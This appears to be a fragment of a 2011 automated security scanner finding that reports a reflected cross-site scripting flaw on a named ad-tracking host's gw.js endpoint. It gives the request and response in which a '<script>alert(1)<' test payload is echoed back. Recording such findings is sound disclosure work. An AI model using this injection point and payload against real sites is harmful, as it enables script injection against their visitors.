HTTP/1.1 200 OK Connection: close Date: Fri, 06 May 2011 21:50:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 06 May 2011 21:50:28 GMT Content-Type: application/x-javascript Content-Length: 69 // Error: Unknown parameter e69b7<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://js.revsci.net |
Path: | /gateway/gw.js |
GET /gateway/gw.js?csid Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=8e1e11639864 |